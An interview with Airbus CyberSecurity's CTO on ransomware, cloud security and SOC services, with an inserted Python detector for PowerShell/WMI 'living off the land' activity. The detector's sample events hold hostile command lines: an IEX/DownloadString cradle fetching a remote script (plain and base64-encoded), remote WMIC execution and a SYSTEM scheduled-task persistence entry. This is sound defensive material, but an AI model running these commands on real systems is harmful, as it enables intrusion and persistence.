IT security

Andreas Mühlbauer,

Daily attacks with ransomware

Paddy Francis is CTO of Airbus CyberSecurity. Andreas Mühlbauer spoke to him about the threats that cyber attacks pose to industrial companies, the security of cloud systems, and the available defense strategies and their chances of success.

From a cyber security perspective - what are the biggest threats to companies, their data and their know-how?

This depends heavily on the type of company, the business model and the motivation of the potential attackers. The attacker's goal could be financial, political or even revenge. From this point of view, insider attacks should not be ruled out. Potential threats to the business model can be massive disruptions to business processes and services that directly affect production or make it impossible for the company to access its own important data. There are also other issues such as loss of intellectual property or loss of customer data, which can have a direct financial impact through fines or litigation and reputational damage.

Most sophisticated attacks still come from foreign intelligence services, but cybercriminals are a close second. In fact, the distinction between state actors and criminals is often hard to maintain, as criminal groups can act as proxies for state actors. Ransomware is still one of the biggest threats. Even though there are many other types of attacks such as phishing, cybercriminals still like to spread ransomware as widely as possible in the hope of making financial gains. Everyone should be aware of this potential risk. Other attacks also aim to exploit vulnerabilities in small and medium-sized enterprises (SMEs) in the supply chain to gain access to company systems, particularly intellectual property and commercial information. Once they have penetrated the system, cybercriminals can use administration tools such as PowerShell and WMI to continue the attack without using malware that may be detected.


To what extent can a company really protect its IT and its entire production from attacks?

To quote Benjamin Franklin: "In this world, nothing is certain except death and taxes." There are no one hundred percent guarantees. Nor is there one miracle cure. However, there are various measures that can be taken to protect companies' IT and production systems from attacks. In order to determine these, it is important to carry out a cyber risk assessment to identify the potential impact of an attack on the company and assess its risk rating. Ideally, a company balances how much it spends on defending its systems against an attack and how much it spends on monitoring to detect and then respond to a vulnerability when it occurs. The balance depends on the business risk and the available budget for cyber security. In many cases, companies will not want to change their existing systems to create better defenses. This may result in the need for extensive monitoring and, in some cases, near-continuous incident response, as the infrastructure cannot be defended due to lack of zoning, uncontrolled use of administrator rights and the absence of defenses within the system.

In general, however, around 80 to 90 percent of attacks on IT systems can be easily stopped by standard measures such as timely patching, virus protection, use of least privilege principles, vulnerability assessment and two-factor authentication for remote access and critical systems and servers. For Operational Technology (OT) systems, similar measures as well as zoning and monitoring can provide protection, but these vary depending on the system. Defensive architectures can also be used on both IT and OT systems to create a hostile environment for the attacker, slowing them down and forcing them to reveal themselves. This makes it easier to detect the attack and subsequently respond to incidents. With further measures, security can be gradually improved, but 100% protection can never be guaranteed.

Is storing your own data in an external cloud an insecurity factor?

There are always risks, but these differ between external data storage and in-house data storage. When using the cloud in particular, it is not always possible to trace where your data is physically stored. In order to comply with data protection requirements, you are dependent on the cloud provider and the contract concluded with them. On the other hand, it could be argued that data stored in the cloud is more secure because cloud providers are able to provide resilient multi-site storage and mirroring of data to keep it available in the event of a disaster, which is not always the case with on-site storage. Depending on the organization, cloud services can also provide better protection against data theft, especially for SMBs that may not have the resources to manage complex on-site security systems. However, one of the biggest risks with cloud storage is misconfiguration by the user.

Cloud services definitely have their place in the discussion, but the ability to manage security aspects is based on other aspects. This starts with the selection of the cloud provider, the agreement of the SLAs and the inclusion of clauses in the contracts that cover the required security and data protection aspects.

What services does Airbus CyberSecurity offer its customers?

We currently operate Security Operations Centers (SOCs) in Germany, France and the UK, all of which operate 24/7, and we will soon have a fourth SOC in Spain. From these SOCs, we offer managed security services for government agencies and corporate customers. These services are tailored to each country and therefore differ slightly from country to country, but include:

  • Protective Monitoring
  • Vulnerability Management
  • Event & Incident Management and response
  • Cyber Threat Intelligence & Threat Hunting
  • Incident Response
  • Penetration Testing

We also install SOCs directly at the customer's premises, train staff to operate them or provide our own staff to operate the SOCs on site.

We also offer consulting services such as security risk analysis and security maturity assessments for IT and OT networks and have recently announced the addition of OT monitoring to offer our customers combined IT/OT SOC services.

What were the most unusual cyber attacks that you personally experienced?

I wouldn't say that I've personally seen any particularly unusual attacks. We are mainly seeing constant scanning for remote code execution vulnerabilities. There has also been a rise in the use of scripting techniques for persistence and lateral movement, coupled with "living off the land" techniques from attackers using legitimate binaries to download or execute payloads. This can be a challenge as there is usually no detectable malware.

WannaCry also introduced the concept of "wormable" ransomware (although some viruses had this before). This type of threat continues to evolve, for example with the recent "BlueKeep" vulnerability.
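The two answers above describe the same detection problem: attackers who, once inside, run PowerShell and WMI for lateral movement, persistence and payload download, so there is no malware file to match a signature against. What a SOC then looks at instead is process-creation telemetry. The following is an added example, not code from the interview or from Airbus CyberSecurity: a small triage routine over constructed process-creation events (field names modelled on Sysmon Event ID 1 / Security Event ID 4688) that flags the patterns named in the interview, including decoding a PowerShell -EncodedCommand payload (base64 over UTF-16LE, which is what powershell.exe expects) so that a download cradle hidden inside it can still be spotted. The host names, paths, IP addresses and rule names are all invented for the example.

```python
"""Triage of Windows process-creation events for "living off the land" activity.

Added example; not code from the interview or from Airbus CyberSecurity.
All events below are constructed for the example.
"""
import base64
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# -EncodedCommand and its common abbreviations (-e, -ec, -en, -enc), followed by base64.
ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Download cradles and in-memory execution helpers typical of script-based intrusions.
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                       r"invoke-expression|\biex\b|frombase64string|start-bitstransfer", re.I)
# Hidden window / execution-policy bypass (-w hidden, -WindowStyle Hidden, -ep bypass, -exec bypass).
EVASION_RE = re.compile(r"-w(?:i[a-z]*)?\s+hidden|-e(?:p|x[a-z]*)\s+bypass", re.I)


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def exe_name(path: str) -> str:
    """Last path component, lower-cased: 'C:\\Windows\\System32\\wbem\\WMIC.exe' -> 'wmic.exe'."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the script passed via -EncodedCommand (base64 of UTF-16LE text), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev: dict) -> list:
    """Apply the heuristics to one process-creation event; returns a list of Findings."""
    host, cmd = ev["host"], ev["cmdline"]
    parent, image = exe_name(ev["parent"]), exe_name(ev["image"])
    out = []
    decoded = decode_encoded_command(cmd)
    script = decoded if decoded is not None else cmd   # inspect the real script, not the base64
    if decoded is not None:
        out.append(Finding(host, "powershell_encoded_command", decoded.strip()))
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:     # macro / phishing document launch
        out.append(Finding(host, "office_spawns_script_host", f"{parent} -> {image}"))
    if image in POWERSHELL:
        m = CRADLE_RE.search(script)
        if m:
            out.append(Finding(host, "powershell_download_cradle", m.group(0)))
        m = EVASION_RE.search(cmd)
        if m:
            out.append(Finding(host, "powershell_evasion_flags", m.group(0)))
    if image == "wmic.exe" and re.search(r"process\s+call\s+create", cmd, re.I):
        node = re.search(r"/node:(\S+)", cmd, re.I)       # /node: means execution on another host
        rule = "wmic_remote_process_create" if node else "wmic_local_process_create"
        out.append(Finding(host, rule, node.group(1) if node else cmd))
    if parent == "wmiprvse.exe" and image in SCRIPT_HOSTS:  # the receiving side of remote WMI exec
        out.append(Finding(host, "wmi_spawned_script_host", f"{parent} -> {image}"))
    lc = cmd.lower()
    if (image == "schtasks.exe" and "/create" in lc) or \
       (image == "reg.exe" and "currentversion\\run" in lc):
        out.append(Finding(host, "persistence_autostart", cmd))
    return out


def analyze(events) -> list:
    return [f for ev in events for f in analyze_event(ev)]


# Constructed sample events. The payload is encoded exactly as an attacker would hand it
# to -EncodedCommand: base64 over the UTF-16LE bytes of the script.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {"host": "ws01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": r"notepad.exe C:\Users\bob\notes.txt"},
    {"host": "ws01", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": PS_EXE, "cmdline": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"},
    {"host": "srv02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic /node:10.0.0.7 process call create "cmd.exe /c whoami > C:\Windows\Temp\w.txt"'},
    {"host": "ws03", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": PS_EXE, "cmdline": 'powershell.exe -nop -c "Get-ChildItem C:\\Users -Recurse -Include *.docx"'},
    {"host": "ws03", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /create /tn OneDriveUpd /tr C:\Users\Public\upd.exe /sc onlogon /ru SYSTEM"},
    {"host": "ws01", "parent": r"C:\Windows\explorer.exe",
     "image": PS_EXE, "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.host:6} {f.rule:30} {f.detail}")
```

The two benign events (Notepad, a scheduled backup script run from Explorer) produce no findings; the Word-spawned PowerShell produces four, because the decoded -EncodedCommand exposes the IEX/DownloadString cradle that the raw command line hides. In a real SOC these rules would be one layer of many and would need tuning against the environment's own administrative scripts, which is exactly why the interview stresses monitoring and response rather than prevention alone.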

How do you react to active attacks or blackmail - for example through ransomware? And how often does this happen?

In the event of an active ransomware attack, we would invoke our Major Incident Management process and isolate the spread of the attack by adding signatures or blocking ports on IPSs and updating firewall rules. While this requires a quick response, it has been successful, as we have proven in the past with wormable malware.

The monitoring in our SOCs shows daily ransomware attempts among our customer base. All attempts to download or execute malicious ransomware payloads are detected and blocked. We also conduct threat intelligence to identify new ransomware campaigns and deploy signatures gained from this information to SOC toolsets so that we have effective protection in place before our customer networks can be infected.
